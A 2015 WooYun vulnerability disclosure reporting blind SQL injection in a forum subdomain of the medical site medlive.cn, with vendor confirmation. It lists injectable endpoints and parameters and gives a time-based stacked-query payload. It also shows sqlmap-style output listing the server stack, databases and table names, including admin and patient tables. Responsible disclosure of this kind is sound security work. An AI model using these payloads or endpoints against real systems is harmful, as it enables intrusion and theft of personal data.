当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108546

漏洞标题:医脉通某站多处SQL盲注

相关厂商:medlive.cn

漏洞作者: 路人甲

提交时间:2015-04-19 10:52

修复时间:2015-06-04 13:22

公开时间:2015-06-04 13:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-19: 细节已通知厂商并且等待厂商处理中
2015-04-20: 厂商已经确认,细节仅向厂商公开
2015-04-30: 细节向核心白帽子及相关领域专家公开
2015-05-10: 细节向普通白帽子公开
2015-05-20: 细节向实习白帽子公开
2015-06-04: 细节向公众公开

简要描述:

RT

详细说明:

1,http://endop.medlive.cn/forum/index.php?group_id=0&topic_type=*
2,
POST http://endop.medlive.cn/group/search.ajax.php  (condition=*&groupid=0&t=0.6027870282996446)
3,
http://endop.medlive.cn:80/forum/edit_group_info.php (POST)
-------AcunetixBoundary_GBVDNQRFSB
Content-Disposition: form-data; name="group_id"
2
-------AcunetixBoundary_GBVDNQRFSB
Content-Disposition: form-data; name="summary"
1
-------AcunetixBoundary_GBVDNQRFSB
Content-Disposition: form-data; name="logo"; filename="1.txt"
Content-Type: text/plain
-------AcunetixBoundary_GBVDNQRFSB--

漏洞证明:

---
Parameter: MULTIPART group_id ((custom) POST)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: -------AcunetixBoundary_GBVDNQRFSB
Content-Disposition: form-data; name="group_id"
2;(SELECT * FROM (SELECT(SLEEP(5)))FxxK)#
-------AcunetixBoundary_GBVDNQRFSB
Content-Disposition: form-data; name="summary"
1
-------AcunetixBoundary_GBVDNQRFSB
Content-Disposition: form-data; name="logo"; filename="1.txt"
Content-Type: text/plain
-------AcunetixBoundary_GBVDNQRFSB--
---
[11:14:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
available databases [3]:
[*] endu
[*] endu_patient
[*] information_schema
Database: endu
[110 tables]
+--------------------------+
| cms_admin                |
| cms_admin_role           |
| cms_admin_role_priv      |
| cms_ads_1109             |
| cms_ads_1110             |
| cms_area                 |
| cms_attachment           |
| cms_author               |
| cms_block                |
| cms_c_activity           |
| cms_c_case               |
| cms_c_experts            |
| cms_c_ku6video           |
| cms_c_patients           |
| cms_c_read               |
| cms_c_wenxian            |
| cms_c_zhuanqu            |
| cms_cache_count          |
| cms_category             |
| cms_collect              |
| cms_content              |
| cms_content_count        |
| cms_content_position     |
| cms_content_tag          |
| cms_copyfrom             |
| cms_datasource           |
| cms_editor_data          |
| cms_endu_baidu           |
| cms_endu_mycomments      |
| cms_endu_myconsult       |
| cms_endu_mydownload      |
| cms_endu_mypolls         |
| cms_endu_mytopics        |
| cms_endu_qq              |
| cms_endu_qq_session      |
| cms_endu_renren          |
| cms_endu_sina            |
| cms_error_report         |
| cms_hits                 |
| cms_ipbanned             |
| cms_keylink              |
| cms_keyword              |
| cms_linkage              |
| cms_log                  |
| cms_member               |
| cms_member_cache         |
| cms_member_casedoc       |
| cms_member_company       |
| cms_member_detail        |
| cms_member_doctor        |
| cms_member_expert        |
| cms_member_group         |
| cms_member_group_extend  |
| cms_member_group_priv    |
| cms_member_info          |
| cms_member_oa            |
| cms_menu                 |
| cms_model                |
| cms_model_field          |
| cms_module               |
| cms_player               |
| cms_position             |
| cms_process              |
| cms_process_status       |
| cms_role                 |
| cms_search               |
| cms_search_type          |
| cms_session              |
| cms_space                |
| cms_space_api            |
| cms_status               |
| cms_times                |
| cms_type                 |
| cms_urlrule              |
| cms_video                |
| cms_video_count          |
| cms_video_data           |
| cms_video_position       |
| cms_video_special        |
| cms_video_special_list   |
| cms_video_tag            |
| cms_vote_useroption      |
| cms_workflow             |
| download_file_count      |
| group_category           |
| group_forum              |
| group_info               |
| group_info_ext_category  |
| group_join_queue         |
| group_member             |
| group_private_topic      |
| group_private_topic_post |
| group_topic              |
| group_topic_copy         |
| group_topic_post         |
| group_topic_post_copy    |
| upload_file              |
| v_list_activity          |
| v_list_case              |
| v_list_experts           |
| v_list_group             |
| v_list_patients          |
| v_list_read              |
| v_list_zhuanqu           |
| v_show_case              |
| v_show_experts           |
| v_show_patients          |
| v_show_read              |
| v_show_zhuanqu           |
| v_user_info              |
+--------------------------+

修复方案:

这些参数存在的地方 几乎都存在问题,修改的时候不要只改这一处。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-04-20 13:21

厂商回复:

非常感谢,处理中

最新状态:

暂无